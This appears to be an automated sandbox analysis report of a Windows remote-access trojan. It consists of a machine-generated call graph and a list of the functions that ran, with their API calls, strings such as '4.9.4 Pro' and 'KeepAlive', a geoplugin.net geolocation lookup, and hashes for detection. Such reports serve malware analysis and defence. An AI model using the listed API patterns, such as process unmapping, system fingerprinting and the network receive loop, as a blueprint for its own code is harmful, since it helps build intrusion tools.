48696->48699 48698 405159 48699->48698 48700->48567 48701->48559 48702->48589 48703->48604 48704->48599 48705->48570 48707->48618 48711 414553 48708->48711 48712 414568 ___scrt_initialize_default_local_stdio_options 48711->48712 48715 43f79d 48712->48715 48718 43c4f0 48715->48718 48719 43c530 48718->48719 48720 43c518 48718->48720 48719->48720 48722 43c538 48719->48722 48733 4405dd 20 API calls _Atexit 48720->48733 48734 43a7b7 36 API calls 3 library calls 48722->48734 48724 43c548 48735 43cc76 20 API calls 2 library calls 48724->48735 48725 43c51d _Atexit 48727 434fcb ___crtLCMapStringA 5 API calls 48725->48727 48729 414576 48727->48729 48728 43c5c0 48736 43d2e4 51 API calls 3 library calls 48728->48736 48729->47993 48732 43c5cb 48737 43cce0 20 API calls _free 48732->48737 48733->48725 48734->48724 48735->48728 48736->48732 48737->48725 48739 441c94 48738->48739 48741 441ccb _Atexit 48739->48741 48742 4405dd 20 API calls _Atexit 48739->48742 48741->48625 48742->48741 48744 405214 48743->48744 48745 4023ce 11 API calls 48744->48745 48746 40521f 48745->48746 48750 405234 48746->48750 48748 40522e 48748->48658 48749->48665 48751 405240 48750->48751 48752 40526e 48750->48752 48754 4028e8 28 API calls 48751->48754 48766 4028a4 22 API calls 48752->48766 48756 40524a 48754->48756 48756->48748 48768 404ba0 WaitForSingleObject 48767->48768 48769 404bcd recv 48767->48769 48786 421076 54 API calls 48768->48786 48771 404be0 48769->48771 48771->48676 48772 404bbc SetEvent 48772->48771 48774 4020df 11 API calls 48773->48774 48778 404cde 48774->48778 48775 404e13 48776 401fd8 11 API calls 48775->48776 48777 404e1c 48776->48777 48777->48676 48778->48775 48779 401fe2 28 API calls 48778->48779 48780 401fd8 11 API calls 48778->48780 48781 4020f6 28 API calls 48778->48781 48782 401fc0 28 API calls 48778->48782 48784 4041a2 28 API calls 48778->48784 48779->48778 48780->48778 48781->48778 48783 404dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 48782->48783 48783->48778 48787 415aea 48783->48787 48784->48778 48785->48681 48786->48772 48788 4020f6 28 API calls 48787->48788 48789 415b0c SetEvent 48788->48789 48790 415b21 48789->48790 48791 4041a2 28 API calls 48790->48791 48792 415b3b 48791->48792 48793 4020f6 28 API calls 48792->48793 48794 415b4b 48793->48794 48795 4020f6 28 API calls 48794->48795 48796 415b5d 48795->48796 48797 41be1b 28 API calls 48796->48797 48798 415b66 48797->48798 48799 415b86 GetTickCount 48798->48799 48800 415ce5 48798->48800 48864 415cd6 48798->48864 48802 41bb8e 28 API calls 48799->48802 48800->48864 48865 415cf9 48800->48865 48801 401e8d 11 API calls 48803 417092 48801->48803 48804 415b97 48802->48804 48805 401fd8 11 API calls 48803->48805 48807 41bae6 GetTickCount 48804->48807 48808 41709e 48805->48808 48809 415ba3 48807->48809 48810 401fd8 11 API calls 48808->48810 48811 41bb8e 28 API calls 48809->48811 48812 4170aa 48810->48812 48813 415bae 48811->48813 48814 41ba96 30 API calls 48813->48814 48815 415bbc 48814->48815 48866 41bd1e 48815->48866 48818 401e65 22 API calls 48819 415bd8 48818->48819 48820 402f31 28 API calls 48819->48820 48821 415be6 48820->48821 48870 402ea1 48821->48870 48824 402f10 28 API calls 48825 415c04 48824->48825 48826 402ea1 28 API calls 48825->48826 48827 415c13 48826->48827 48828 402f10 28 API calls 48827->48828 48829 415c1f 48828->48829 48830 402ea1 28 API calls 48829->48830 48831 415c29 48830->48831 48832 404aa1 61 API calls 48831->48832 48833 415c38 48832->48833 48834 401fd8 11 API calls 48833->48834 48835 415c41 48834->48835 48836 401fd8 11 API calls 48835->48836 48837 415c4d 48836->48837 48838 401fd8 11 API calls 48837->48838 48839 415c59 48838->48839 48840 401fd8 11 API calls 48839->48840 48841 415c65 48840->48841 48842 401fd8 11 API calls 48841->48842 48843 415c71 48842->48843 48844 401fd8 11 API calls 48843->48844 48845 415c7d 48844->48845 48846 401f09 11 API calls 48845->48846 48847 415c86 48846->48847 48848 401fd8 11 API calls 48847->48848 48849 415c8f 48848->48849 48850 401fd8 11 API calls 48849->48850 48851 415c98 48850->48851 48852 401e65 22 API calls 48851->48852 48853 415ca3 48852->48853 48854 43baac _strftime 40 API calls 48853->48854 48855 415cb0 48854->48855 48856 415cb5 48855->48856 48857 415cdb 48855->48857 48859 415cc3 48856->48859 48860 415cce 48856->48860 48858 401e65 22 API calls 48857->48858 48858->48800 48879 404ff4 82 API calls 48859->48879 48861 404f51 105 API calls 48860->48861 48861->48864 48863 415cc9 48863->48864 48864->48801 48880 4050e4 84 API calls 48865->48880 48867 41bd2b 48866->48867 48868 4020b7 28 API calls 48867->48868 48869 415bca 48868->48869 48869->48818 48871 402eb0 48870->48871 48872 402ef2 48871->48872 48877 402ee7 48871->48877 48873 401fb0 28 API calls 48872->48873 48874 402ef0 48873->48874 48875 402055 11 API calls 48874->48875 48876 402f09 48875->48876 48876->48824 48881 403365 28 API calls 48877->48881 48879->48863 48880->48863 48881->48874 48884 401f8e 48883->48884 48885 402252 11 API calls 48884->48885 48886 401f99 48885->48886 48886->48019 48886->48020 48886->48022 48887->48025 48888->48053 48889->48052 48890->48041 48891->48047 48892->48051 48893->48084 48898 40f7c2 48896->48898 48897 413549 3 API calls 48897->48898 48898->48897 48900 40f866 48898->48900 48902 40f856 Sleep 48898->48902 48918 40f7f4 48898->48918 48899 40905c 28 API calls 48899->48918 48901 40905c 28 API calls 48900->48901 48904 40f871 48901->48904 48902->48898 48903 41bc5e 28 API calls 48903->48918 48906 41bc5e 28 API calls 48904->48906 48907 40f87d 48906->48907 48931 413814 14 API calls 48907->48931 48910 401f09 11 API calls 48910->48918 48911 40f890 48912 401f09 11 API calls 48911->48912 48914 40f89c 48912->48914 48913 402093 28 API calls 48913->48918 48915 402093 28 API calls 48914->48915 48916 40f8ad 48915->48916 48919 41376f 14 API calls 48916->48919 48917 41376f 14 API calls 48917->48918 48918->48899 48918->48902 48918->48903 48918->48910 48918->48913 48918->48917 48929 40d096 112 API calls ___scrt_get_show_window_mode 48918->48929 48930 413814 14 API calls 48918->48930 48920 40f8c0 48919->48920 48932 412850 TerminateProcess WaitForSingleObject 48920->48932 48922 40f8c8 ExitProcess 48933 4127ee 62 API calls 48924->48933 48930->48918 48931->48911 48932->48922 48934 415d06 48949 41b380 48934->48949 48936 415d0f 48937 4020f6 28 API calls 48936->48937 48938 415d1e 48937->48938 48939 404aa1 61 API calls 48938->48939 48940 415d2a 48939->48940 48941 417089 48940->48941 48942 401fd8 11 API calls 48940->48942 48943 401e8d 11 API calls 48941->48943 48942->48941 48944 417092 48943->48944 48945 401fd8 11 API calls 48944->48945 48946 41709e 48945->48946 48947 401fd8 11 API calls 48946->48947 48948 4170aa 48947->48948 48950 4020df 11 API calls 48949->48950 48951 41b38e 48950->48951 48952 43bd51 new 21 API calls 48951->48952 48953 41b39e InternetOpenW InternetOpenUrlW 48952->48953 48954 41b3c5 InternetReadFile 48953->48954 48957 41b3e8 48954->48957 48955 4020b7 28 API calls 48955->48957 48956 41b415 InternetCloseHandle InternetCloseHandle 48958 41b427 48956->48958 48957->48954 48957->48955 48957->48956 48959 401fd8 11 API calls 48957->48959 48958->48936 48959->48957 48960 43be58 48963 43be64 _swprintf ___scrt_is_nonwritable_in_current_image 48960->48963 48961 43be72 48976 4405dd 20 API calls _Atexit 48961->48976 48963->48961 48964 43be9c 48963->48964 48971 445888 EnterCriticalSection 48964->48971 48966 43bea7 48972 43bf48 48966->48972 48968 43be77 ___scrt_is_nonwritable_in_current_image _Atexit 48971->48966 48974 43bf56 48972->48974 48973 43beb2 48977 43becf LeaveCriticalSection std::_Lockit::~_Lockit 48973->48977 48974->48973 48978 44976c 37 API calls 2 library calls 48974->48978 48976->48968 48977->48968 48978->48974 48979 40165e 48980 401666 48979->48980 48981 401669 48979->48981 48982 4016a8 48981->48982 48984 401696 48981->48984 48983 4344ea new 22 API calls 48982->48983 48985 40169c 48983->48985 48986 4344ea new 22 API calls 48984->48986 48986->48985

                                    Executed Functions

                                    Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    • Opcode ID: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                    • Opcode Fuzzy Hash: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                      • Part of subcall function 00413549: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                      • Part of subcall function 00413549: RegCloseKey.KERNELBASE(?), ref: 00413592
                                    • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 4.9.4 Pro$override$pth_unenc
                                    • API String ID: 2281282204-930821335
                                    • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                    • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1265 404f51-404f5f 1266 404f65-404f6c 1265->1266 1267 404fea 1265->1267 1269 404f74-404f7b 1266->1269 1270 404f6e-404f72 1266->1270 1268 404fec-404ff1 1267->1268 1271 404fc0-404fe8 CreateEventA CreateThread 1269->1271 1272 404f7d-404fbb GetLocalTime call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1269->1272 1270->1271 1271->1268 1272->1271
                                    APIs
                                    • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 2532271599-1507639952
                                    • Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                    • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                    • Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                    • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B62A
                                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Name$ComputerUser
                                    • String ID:
                                    • API String ID: 4229901323-0
                                    • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                    • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                    • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 89 40ec13-40ec1a 79->89 90 40ec0c-40ec0e 79->90 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 94 40ec1c 89->94 95 40ec1e-40ec2a call 41b2c3 89->95 93 40eef1 90->93 93->49 94->95 105 40ec33-40ec37 95->105 106 40ec2c-40ec2e 95->106 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 105->108 109 40ec39 call 407716 105->109 106->105 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 148 40ec71 call 407260 144->148 148->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 204 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->204 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 190 40ee1e-40ee42 call 40247c call 434798 183->190 184->190 212 40ee51 190->212 213 40ee44-40ee4f call 436e90 190->213 204->177 218 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 212->218 213->218 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 218->272 287 40efc1 234->287 288 40efdc-40efde 234->288 272->234 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->286 286->234 306 40eeef 286->306 290 40efc3-40efda call 41cd9b CreateThread 287->290 291 40efe0-40efe2 288->291 292 40efe4 288->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 291->290 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 367 40f1cc-40f1df call 401e65 call 401fab 357->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 402 40f240-40f241 SetProcessDEPPolicy 380->402 403 40f243-40f256 CreateThread 380->403 402->403 406 40f264-40f26b 403->406 407 40f258-40f262 CreateThread 403->407 408 40f279-40f280 406->408 409 40f26d-40f277 CreateThread 406->409 407->406 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                    APIs
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
